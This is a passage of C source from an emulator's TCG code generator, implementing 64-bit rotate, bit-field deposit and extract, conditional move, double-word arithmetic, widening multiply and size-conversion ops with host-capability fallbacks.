TCGV_HIGH(tcg_ctx, ret)); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); #else gen_helper_ctpop_i64(tcg_ctx, ret, arg1); #endif } void tcg_gen_rotl_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { #if TCG_TARGET_HAS_rot_i64 tcg_gen_op3_i64(tcg_ctx, INDEX_op_rotl_i64, ret, arg1, arg2); #else TCGv_i64 t0, t1; t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_shl_i64(tcg_ctx, t0, arg1, arg2); tcg_gen_subfi_i64(tcg_ctx, t1, 64, arg2); tcg_gen_shr_i64(tcg_ctx, t1, arg1, t1); tcg_gen_or_i64(tcg_ctx, ret, t0, t1); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); #endif } void tcg_gen_rotli_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, unsigned arg2) { tcg_debug_assert(arg2 < 64); /* some cases can be optimized here */ if (arg2 == 0) { tcg_gen_mov_i64(tcg_ctx, ret, arg1); } else { #if TCG_TARGET_HAS_rot_i64 TCGv_i64 t0 = tcg_const_i64(tcg_ctx, arg2); tcg_gen_rotl_i64(tcg_ctx, ret, arg1, t0); tcg_temp_free_i64(tcg_ctx, t0); #else TCGv_i64 t0, t1; t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_shli_i64(tcg_ctx, t0, arg1, arg2); tcg_gen_shri_i64(tcg_ctx, t1, arg1, 64 - arg2); tcg_gen_or_i64(tcg_ctx, ret, t0, t1); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); #endif } } void tcg_gen_rotr_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { #if TCG_TARGET_HAS_rot_i64 tcg_gen_op3_i64(tcg_ctx, INDEX_op_rotr_i64, ret, arg1, arg2); #else TCGv_i64 t0, t1; t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_shr_i64(tcg_ctx, t0, arg1, arg2); tcg_gen_subfi_i64(tcg_ctx, t1, 64, arg2); tcg_gen_shl_i64(tcg_ctx, t1, arg1, t1); tcg_gen_or_i64(tcg_ctx, ret, t0, t1); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); #endif } void tcg_gen_rotri_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, unsigned arg2) { tcg_debug_assert(arg2 < 64); /* some cases can be optimized here */ if (arg2 == 0) { tcg_gen_mov_i64(tcg_ctx, ret, arg1); } else { tcg_gen_rotli_i64(tcg_ctx, ret, arg1, 64 - arg2); } } void tcg_gen_deposit_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2, unsigned int ofs, unsigned int len) { uint64_t mask; TCGv_i64 t1; tcg_debug_assert(ofs < 64); tcg_debug_assert(len > 0); tcg_debug_assert(len <= 64); tcg_debug_assert(ofs + len <= 64); if (len == 64) { 
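        /* Depositing all 64 bits simply replaces arg1 with arg2. */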
tcg_gen_mov_i64(tcg_ctx, ret, arg2); return; } #if TCG_TARGET_HAS_deposit_i64 if (TCG_TARGET_deposit_i64_valid(ofs, len)) { tcg_gen_op5ii_i64(tcg_ctx, INDEX_op_deposit_i64, ret, arg1, arg2, ofs, len); return; } #endif #if TCG_TARGET_REG_BITS == 32 if (ofs >= 32) { tcg_gen_deposit_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), TCGV_LOW(tcg_ctx, arg2), ofs - 32, len); tcg_gen_mov_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1)); return; } if (ofs + len <= 32) { tcg_gen_deposit_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), TCGV_LOW(tcg_ctx, arg2), ofs, len); tcg_gen_mov_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1)); return; } #endif t1 = tcg_temp_new_i64(tcg_ctx); #if TCG_TARGET_HAS_extract2_i64 if (ofs + len == 64) { tcg_gen_shli_i64(tcg_ctx, t1, arg1, len); tcg_gen_extract2_i64(tcg_ctx, ret, t1, arg2, len); goto done; } if (ofs == 0) { tcg_gen_extract2_i64(tcg_ctx, ret, arg1, arg2, len); tcg_gen_rotli_i64(tcg_ctx, ret, ret, len); goto done; } #endif mask = (1ull << len) - 1; if (ofs + len < 64) { tcg_gen_andi_i64(tcg_ctx, t1, arg2, mask); tcg_gen_shli_i64(tcg_ctx, t1, t1, ofs); } else { tcg_gen_shli_i64(tcg_ctx, t1, arg2, ofs); } tcg_gen_andi_i64(tcg_ctx, ret, arg1, ~(mask << ofs)); tcg_gen_or_i64(tcg_ctx, ret, ret, t1); #if TCG_TARGET_HAS_extract2_i64 done: #endif tcg_temp_free_i64(tcg_ctx, t1); } void tcg_gen_deposit_z_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg, unsigned int ofs, unsigned int len) { tcg_debug_assert(ofs < 64); tcg_debug_assert(len > 0); tcg_debug_assert(len <= 64); tcg_debug_assert(ofs + len <= 64); if (ofs + len == 64) { tcg_gen_shli_i64(tcg_ctx, ret, arg, ofs); } else if (ofs == 0) { tcg_gen_andi_i64(tcg_ctx, ret, arg, (1ull << len) - 1); #if TCG_TARGET_HAS_deposit_i64 } else if (TCG_TARGET_deposit_i64_valid(ofs, len)) { TCGv_i64 zero = tcg_const_i64(tcg_ctx, 0); tcg_gen_op5ii_i64(tcg_ctx, INDEX_op_deposit_i64, ret, zero, arg, ofs, len); tcg_temp_free_i64(tcg_ctx, zero); #endif } else { #if TCG_TARGET_REG_BITS == 32 if (ofs >= 32) { tcg_gen_deposit_z_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg), ofs - 32, len); tcg_gen_movi_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), 0); return; } if (ofs + len <= 32) { tcg_gen_deposit_z_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg), ofs, len); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); return; } #endif /* To help two-operand hosts we prefer to zero-extend first, which allows ARG to stay live. */ switch (len) { case 32: #if TCG_TARGET_HAS_ext32u_i64 tcg_gen_ext32u_i64(tcg_ctx, ret, arg); tcg_gen_shli_i64(tcg_ctx, ret, ret, ofs); return; #endif break; case 16: #if TCG_TARGET_HAS_ext16u_i64 tcg_gen_ext16u_i64(tcg_ctx, ret, arg); tcg_gen_shli_i64(tcg_ctx, ret, ret, ofs); return; #endif break; case 8: #if TCG_TARGET_HAS_ext8u_i64 tcg_gen_ext8u_i64(tcg_ctx, ret, arg); tcg_gen_shli_i64(tcg_ctx, ret, ret, ofs); return; #endif break; } /* Otherwise prefer zero-extension over AND for code size. 
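   extNu is typically a single host instruction, whereas a wide immediate
   AND may first need the mask materialized in a register.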
*/ switch (ofs + len) { case 32: #if TCG_TARGET_HAS_ext32u_i64 tcg_gen_shli_i64(tcg_ctx, ret, arg, ofs); tcg_gen_ext32u_i64(tcg_ctx, ret, ret); return; #endif break; case 16: #if TCG_TARGET_HAS_ext16u_i64 tcg_gen_shli_i64(tcg_ctx, ret, arg, ofs); tcg_gen_ext16u_i64(tcg_ctx, ret, ret); return; #endif break; case 8: #if TCG_TARGET_HAS_ext8u_i64 tcg_gen_shli_i64(tcg_ctx, ret, arg, ofs); tcg_gen_ext8u_i64(tcg_ctx, ret, ret); return; #endif break; } tcg_gen_andi_i64(tcg_ctx, ret, arg, (1ull << len) - 1); tcg_gen_shli_i64(tcg_ctx, ret, ret, ofs); } } void tcg_gen_extract_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg, unsigned int ofs, unsigned int len) { tcg_debug_assert(ofs < 64); tcg_debug_assert(len > 0); tcg_debug_assert(len <= 64); tcg_debug_assert(ofs + len <= 64); /* Canonicalize certain special cases, even if extract is supported. */ if (ofs + len == 64) { tcg_gen_shri_i64(tcg_ctx, ret, arg, 64 - len); return; } if (ofs == 0) { tcg_gen_andi_i64(tcg_ctx, ret, arg, (1ull << len) - 1); return; } #if TCG_TARGET_REG_BITS == 32 /* Look for a 32-bit extract within one of the two words. */ if (ofs >= 32) { tcg_gen_extract_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg), ofs - 32, len); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); return; } if (ofs + len <= 32) { tcg_gen_extract_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg), ofs, len); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); return; } /* The field is split across two words. One double-word shift is better than two double-word shifts. */ goto do_shift_and; #endif #if TCG_TARGET_HAS_extract_i64 if (TCG_TARGET_extract_i64_valid(ofs, len)) { tcg_gen_op4ii_i64(tcg_ctx, INDEX_op_extract_i64, ret, arg, ofs, len); return; } #endif /* Assume that zero-extension, if available, is cheaper than a shift. */ switch (ofs + len) { case 32: #if TCG_TARGET_HAS_ext32u_i64 tcg_gen_ext32u_i64(tcg_ctx, ret, arg); tcg_gen_shri_i64(tcg_ctx, ret, ret, ofs); return; #endif break; case 16: #if TCG_TARGET_HAS_ext16u_i64 tcg_gen_ext16u_i64(tcg_ctx, ret, arg); tcg_gen_shri_i64(tcg_ctx, ret, ret, ofs); return; #endif break; case 8: #if TCG_TARGET_HAS_ext8u_i64 tcg_gen_ext8u_i64(tcg_ctx, ret, arg); tcg_gen_shri_i64(tcg_ctx, ret, ret, ofs); return; #endif break; } /* ??? Ideally we'd know what values are available for immediate AND. Assume that 8 bits are available, plus the special cases of 16 and 32, so that we get ext8u, ext16u, and ext32u. */ switch (len) { case 1: case 2: case 3: case 4: case 5: case 6: case 7: case 8: case 16: case 32: #if TCG_TARGET_REG_BITS == 32 do_shift_and: #endif tcg_gen_shri_i64(tcg_ctx, ret, arg, ofs); tcg_gen_andi_i64(tcg_ctx, ret, ret, (1ull << len) - 1); break; default: tcg_gen_shli_i64(tcg_ctx, ret, arg, 64 - len - ofs); tcg_gen_shri_i64(tcg_ctx, ret, ret, 64 - len); break; } } void tcg_gen_sextract_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg, unsigned int ofs, unsigned int len) { tcg_debug_assert(ofs < 64); tcg_debug_assert(len > 0); tcg_debug_assert(len <= 64); tcg_debug_assert(ofs + len <= 64); /* Canonicalize certain special cases, even if sextract is supported. */ if (ofs + len == 64) { tcg_gen_sari_i64(tcg_ctx, ret, arg, 64 - len); return; } if (ofs == 0) { switch (len) { case 32: tcg_gen_ext32s_i64(tcg_ctx, ret, arg); return; case 16: tcg_gen_ext16s_i64(tcg_ctx, ret, arg); return; case 8: tcg_gen_ext8s_i64(tcg_ctx, ret, arg); return; } } #if TCG_TARGET_REG_BITS == 32 /* Look for a 32-bit extract within one of the two words. 
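   If the field lies wholly within one half, sextract_i32 on that half
   does the work; the high word of the result is then just the sign
   replication performed after this if/else chain.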
*/ if (ofs >= 32) { tcg_gen_sextract_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg), ofs - 32, len); } else if (ofs + len <= 32) { tcg_gen_sextract_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg), ofs, len); } else if (ofs == 0) { tcg_gen_mov_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg)); tcg_gen_sextract_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg), 0, len - 32); return; } else if (len > 32) { TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); /* Extract the bits for the high word normally. */ tcg_gen_sextract_i32(tcg_ctx, t, TCGV_HIGH(tcg_ctx, arg), ofs + 32, len - 32); /* Shift the field down for the low part. */ tcg_gen_shri_i64(tcg_ctx, ret, arg, ofs); /* Overwrite the shift into the high part. */ tcg_gen_mov_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), t); tcg_temp_free_i32(tcg_ctx, t); return; } else { /* Shift the field down for the low part, such that the field sits at the MSB. */ tcg_gen_shri_i64(tcg_ctx, ret, arg, ofs + len - 32); /* Shift the field down from the MSB, sign extending. */ tcg_gen_sari_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, ret), 32 - len); } /* Sign-extend the field from 32 bits. */ tcg_gen_sari_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_LOW(tcg_ctx, ret), 31); return; #endif #if TCG_TARGET_HAS_sextract_i64 if (TCG_TARGET_extract_i64_valid(ofs, len)) { tcg_gen_op4ii_i64(tcg_ctx, INDEX_op_sextract_i64, ret, arg, ofs, len); return; } #endif /* Assume that sign-extension, if available, is cheaper than a shift. */ switch (ofs + len) { case 32: #if TCG_TARGET_HAS_ext32s_i64 tcg_gen_ext32s_i64(tcg_ctx, ret, arg); tcg_gen_sari_i64(tcg_ctx, ret, ret, ofs); return; #endif break; case 16: #if TCG_TARGET_HAS_ext16s_i64 tcg_gen_ext16s_i64(tcg_ctx, ret, arg); tcg_gen_sari_i64(tcg_ctx, ret, ret, ofs); return; #endif break; case 8: #if TCG_TARGET_HAS_ext8s_i64 tcg_gen_ext8s_i64(tcg_ctx, ret, arg); tcg_gen_sari_i64(tcg_ctx, ret, ret, ofs); return; #endif break; } switch (len) { case 32: #if TCG_TARGET_HAS_ext32s_i64 tcg_gen_shri_i64(tcg_ctx, ret, arg, ofs); tcg_gen_ext32s_i64(tcg_ctx, ret, ret); return; #endif break; case 16: #if TCG_TARGET_HAS_ext16s_i64 tcg_gen_shri_i64(tcg_ctx, ret, arg, ofs); tcg_gen_ext16s_i64(tcg_ctx, ret, ret); return; #endif break; case 8: #if TCG_TARGET_HAS_ext8s_i64 tcg_gen_shri_i64(tcg_ctx, ret, arg, ofs); tcg_gen_ext8s_i64(tcg_ctx, ret, ret); return; #endif break; } tcg_gen_shli_i64(tcg_ctx, ret, arg, 64 - len - ofs); tcg_gen_sari_i64(tcg_ctx, ret, ret, 64 - len); } /* * Extract 64 bits from a 128-bit input, ah:al, starting from ofs. * Unlike tcg_gen_extract_i64 above, len is fixed at 64. 
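 * Equivalently: ret = (uint64_t)((ah:al) >> ofs), for 0 <= ofs <= 64.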
*/ void tcg_gen_extract2_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 al, TCGv_i64 ah, unsigned int ofs) { tcg_debug_assert(ofs <= 64); if (ofs == 0) { tcg_gen_mov_i64(tcg_ctx, ret, al); } else if (ofs == 64) { tcg_gen_mov_i64(tcg_ctx, ret, ah); } else if (al == ah) { tcg_gen_rotri_i64(tcg_ctx, ret, al, ofs); } else { #if TCG_TARGET_HAS_extract2_i64 tcg_gen_op4i_i64(tcg_ctx, INDEX_op_extract2_i64, ret, al, ah, ofs); #else TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_shri_i64(tcg_ctx, t0, al, ofs); tcg_gen_deposit_i64(tcg_ctx, ret, t0, ah, 64 - ofs, ofs); tcg_temp_free_i64(tcg_ctx, t0); #endif } } void tcg_gen_movcond_i64(TCGContext *tcg_ctx, TCGCond cond, TCGv_i64 ret, TCGv_i64 c1, TCGv_i64 c2, TCGv_i64 v1, TCGv_i64 v2) { if (cond == TCG_COND_ALWAYS) { tcg_gen_mov_i64(tcg_ctx, ret, v1); } else if (cond == TCG_COND_NEVER) { tcg_gen_mov_i64(tcg_ctx, ret, v2); } else { #if TCG_TARGET_REG_BITS == 32 TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_op6i_i32(tcg_ctx, INDEX_op_setcond2_i32, t0, TCGV_LOW(tcg_ctx, c1), TCGV_HIGH(tcg_ctx, c1), TCGV_LOW(tcg_ctx, c2), TCGV_HIGH(tcg_ctx, c2), cond); #if TCG_TARGET_HAS_movcond_i32 tcg_gen_movi_i32(tcg_ctx, t1, 0); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, TCGV_LOW(tcg_ctx, ret), t0, t1, TCGV_LOW(tcg_ctx, v1), TCGV_LOW(tcg_ctx, v2)); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, TCGV_HIGH(tcg_ctx, ret), t0, t1, TCGV_HIGH(tcg_ctx, v1), TCGV_HIGH(tcg_ctx, v2)); #else tcg_gen_neg_i32(tcg_ctx, t0, t0); tcg_gen_and_i32(tcg_ctx, t1, TCGV_LOW(tcg_ctx, v1), t0); tcg_gen_andc_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, v2), t0); tcg_gen_or_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, ret), t1); tcg_gen_and_i32(tcg_ctx, t1, TCGV_HIGH(tcg_ctx, v1), t0); tcg_gen_andc_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, v2), t0); tcg_gen_or_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, ret), t1); #endif tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); #elif TCG_TARGET_HAS_movcond_i64 tcg_gen_op6i_i64(tcg_ctx, INDEX_op_movcond_i64, ret, c1, c2, v1, v2, cond); #else TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_setcond_i64(tcg_ctx, cond, t0, c1, c2); tcg_gen_neg_i64(tcg_ctx, t0, t0); tcg_gen_and_i64(tcg_ctx, t1, v1, t0); tcg_gen_andc_i64(tcg_ctx, ret, v2, t0); tcg_gen_or_i64(tcg_ctx, ret, ret, t1); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); #endif } } void tcg_gen_add2_i64(TCGContext *tcg_ctx, TCGv_i64 rl, TCGv_i64 rh, TCGv_i64 al, TCGv_i64 ah, TCGv_i64 bl, TCGv_i64 bh) { #if TCG_TARGET_HAS_add2_i64 tcg_gen_op6_i64(tcg_ctx, INDEX_op_add2_i64, rl, rh, al, ah, bl, bh); #else TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_add_i64(tcg_ctx, t0, al, bl); tcg_gen_setcond_i64(tcg_ctx, TCG_COND_LTU, t1, t0, al); tcg_gen_add_i64(tcg_ctx, rh, ah, bh); tcg_gen_add_i64(tcg_ctx, rh, rh, t1); tcg_gen_mov_i64(tcg_ctx, rl, t0); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); #endif } void tcg_gen_sub2_i64(TCGContext *tcg_ctx, TCGv_i64 rl, TCGv_i64 rh, TCGv_i64 al, TCGv_i64 ah, TCGv_i64 bl, TCGv_i64 bh) { #if TCG_TARGET_HAS_sub2_i64 tcg_gen_op6_i64(tcg_ctx, INDEX_op_sub2_i64, rl, rh, al, ah, bl, bh); #else TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_sub_i64(tcg_ctx, t0, al, bl); tcg_gen_setcond_i64(tcg_ctx, TCG_COND_LTU, t1, al, bl); tcg_gen_sub_i64(tcg_ctx, rh, ah, bh); tcg_gen_sub_i64(tcg_ctx, rh, rh, t1); 
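    /* t1 above is the borrow out of the low half, i.e. (al < bl) unsigned. */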
tcg_gen_mov_i64(tcg_ctx, rl, t0); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); #endif } void tcg_gen_mulu2_i64(TCGContext *tcg_ctx, TCGv_i64 rl, TCGv_i64 rh, TCGv_i64 arg1, TCGv_i64 arg2) { #if TCG_TARGET_HAS_mulu2_i64 tcg_gen_op4_i64(tcg_ctx, INDEX_op_mulu2_i64, rl, rh, arg1, arg2); #elif TCG_TARGET_HAS_muluh_i64 TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_op3_i64(tcg_ctx, INDEX_op_mul_i64, t, arg1, arg2); tcg_gen_op3_i64(tcg_ctx, INDEX_op_muluh_i64, rh, arg1, arg2); tcg_gen_mov_i64(tcg_ctx, rl, t); tcg_temp_free_i64(tcg_ctx, t); #else TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_mul_i64(tcg_ctx, t0, arg1, arg2); gen_helper_muluh_i64(tcg_ctx, rh, arg1, arg2); tcg_gen_mov_i64(tcg_ctx, rl, t0); tcg_temp_free_i64(tcg_ctx, t0); #endif } void tcg_gen_muls2_i64(TCGContext *tcg_ctx, TCGv_i64 rl, TCGv_i64 rh, TCGv_i64 arg1, TCGv_i64 arg2) { #if TCG_TARGET_HAS_muls2_i64 tcg_gen_op4_i64(tcg_ctx, INDEX_op_muls2_i64, rl, rh, arg1, arg2); #elif TCG_TARGET_HAS_mulsh_i64 TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_op3_i64(tcg_ctx, INDEX_op_mul_i64, t, arg1, arg2); tcg_gen_op3_i64(tcg_ctx, INDEX_op_mulsh_i64, rh, arg1, arg2); tcg_gen_mov_i64(tcg_ctx, rl, t); tcg_temp_free_i64(tcg_ctx, t); #elif TCG_TARGET_HAS_mulu2_i64 || TCG_TARGET_HAS_muluh_i64 TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_mulu2_i64(tcg_ctx, t0, t1, arg1, arg2); /* Adjust for negative inputs. */ tcg_gen_sari_i64(tcg_ctx, t2, arg1, 63); tcg_gen_sari_i64(tcg_ctx, t3, arg2, 63); tcg_gen_and_i64(tcg_ctx, t2, t2, arg2); tcg_gen_and_i64(tcg_ctx, t3, t3, arg1); tcg_gen_sub_i64(tcg_ctx, rh, t1, t2); tcg_gen_sub_i64(tcg_ctx, rh, rh, t3); tcg_gen_mov_i64(tcg_ctx, rl, t0); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); #else TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_mul_i64(tcg_ctx, t0, arg1, arg2); gen_helper_mulsh_i64(tcg_ctx, rh, arg1, arg2); tcg_gen_mov_i64(tcg_ctx, rl, t0); tcg_temp_free_i64(tcg_ctx, t0); #endif } void tcg_gen_mulsu2_i64(TCGContext *tcg_ctx, TCGv_i64 rl, TCGv_i64 rh, TCGv_i64 arg1, TCGv_i64 arg2) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_mulu2_i64(tcg_ctx, t0, t1, arg1, arg2); /* Adjust for negative input for the signed arg1. 
*/ tcg_gen_sari_i64(tcg_ctx, t2, arg1, 63); tcg_gen_and_i64(tcg_ctx, t2, t2, arg2); tcg_gen_sub_i64(tcg_ctx, rh, t1, t2); tcg_gen_mov_i64(tcg_ctx, rl, t0); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); } void tcg_gen_smin_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 a, TCGv_i64 b) { tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LT, ret, a, b, a, b); } void tcg_gen_umin_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 a, TCGv_i64 b) { tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LTU, ret, a, b, a, b); } void tcg_gen_smax_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 a, TCGv_i64 b) { tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LT, ret, a, b, b, a); } void tcg_gen_umax_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 a, TCGv_i64 b) { tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LTU, ret, a, b, b, a); } void tcg_gen_abs_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 a) { TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_sari_i64(tcg_ctx, t, a, 63); tcg_gen_xor_i64(tcg_ctx, ret, a, t); tcg_gen_sub_i64(tcg_ctx, ret, ret, t); tcg_temp_free_i64(tcg_ctx, t); } /* Size changing operations. */ void tcg_gen_extrl_i64_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i64 arg) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_mov_i32(tcg_ctx, ret, TCGV_LOW(tcg_ctx, arg)); #elif TCG_TARGET_HAS_extrl_i64_i32 tcg_gen_op2(tcg_ctx, INDEX_op_extrl_i64_i32, tcgv_i32_arg(tcg_ctx, ret), tcgv_i64_arg(tcg_ctx, arg)); #else tcg_gen_mov_i32(tcg_ctx, ret, (TCGv_i32)arg); #endif } void tcg_gen_extrh_i64_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i64 arg) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_mov_i32(tcg_ctx, ret, TCGV_HIGH(tcg_ctx, arg)); #elif TCG_TARGET_HAS_extrh_i64_i32 tcg_gen_op2(tcg_ctx, INDEX_op_extrh_i64_i32, tcgv_i32_arg(tcg_ctx, ret), tcgv_i64_arg(tcg_ctx, arg)); #else TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_shri_i64(tcg_ctx, t, arg, 32); tcg_gen_mov_i32(tcg_ctx, ret, (TCGv_i32)t); tcg_temp_free_i64(tcg_ctx, t); #endif } void tcg_gen_extu_i32_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i32 arg) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_mov_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), arg); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); #else tcg_gen_op2(tcg_ctx, INDEX_op_extu_i32_i64, tcgv_i64_arg(tcg_ctx, ret), tcgv_i32_arg(tcg_ctx, arg)); #endif } void tcg_gen_ext_i32_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i32 arg) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_mov_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), arg); tcg_gen_sari_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_LOW(tcg_ctx, ret), 31); #else tcg_gen_op2(tcg_ctx, INDEX_op_ext_i32_i64, tcgv_i64_arg(tcg_ctx, ret), tcgv_i32_arg(tcg_ctx, arg)); #endif } void tcg_gen_concat_i32_i64(TCGContext *tcg_ctx, TCGv_i64 dest, TCGv_i32 low, TCGv_i32 high) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_mov_i32(tcg_ctx, TCGV_LOW(tcg_ctx, dest), low); tcg_gen_mov_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, dest), high); return; #else TCGv_i64 tmp; tmp = tcg_temp_new_i64(tcg_ctx); /* These extensions are only needed for type correctness. We may be able to do better given target specific information. */ tcg_gen_extu_i32_i64(tcg_ctx, tmp, high); tcg_gen_extu_i32_i64(tcg_ctx, dest, low); /* If deposit is available, use it. Otherwise use the extra knowledge that we have of the zero-extensions above. 
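 * Editor's note (illustrative): either way the result is
 *   dest = ((uint64_t)high << 32) | (uint32_t)low,
 * e.g. low = 0xdeadbeef, high = 0x1234 yields 0x00001234deadbeef; the
 * deposit form simply lets capable hosts do it in a single instruction.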
*/ #if TCG_TARGET_HAS_deposit_i64 if (TCG_TARGET_deposit_i64_valid(32, 32)) { tcg_gen_deposit_i64(tcg_ctx, dest, dest, tmp, 32, 32); } else { #endif tcg_gen_shli_i64(tcg_ctx, tmp, tmp, 32); tcg_gen_or_i64(tcg_ctx, dest, dest, tmp); #if TCG_TARGET_HAS_deposit_i64 } #endif tcg_temp_free_i64(tcg_ctx, tmp); #endif } void tcg_gen_extr_i64_i32(TCGContext *tcg_ctx, TCGv_i32 lo, TCGv_i32 hi, TCGv_i64 arg) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_mov_i32(tcg_ctx, lo, TCGV_LOW(tcg_ctx, arg)); tcg_gen_mov_i32(tcg_ctx, hi, TCGV_HIGH(tcg_ctx, arg)); #else tcg_gen_extrl_i64_i32(tcg_ctx, lo, arg); tcg_gen_extrh_i64_i32(tcg_ctx, hi, arg); #endif } void tcg_gen_extr32_i64(TCGContext *tcg_ctx, TCGv_i64 lo, TCGv_i64 hi, TCGv_i64 arg) { tcg_gen_ext32u_i64(tcg_ctx, lo, arg); tcg_gen_shri_i64(tcg_ctx, 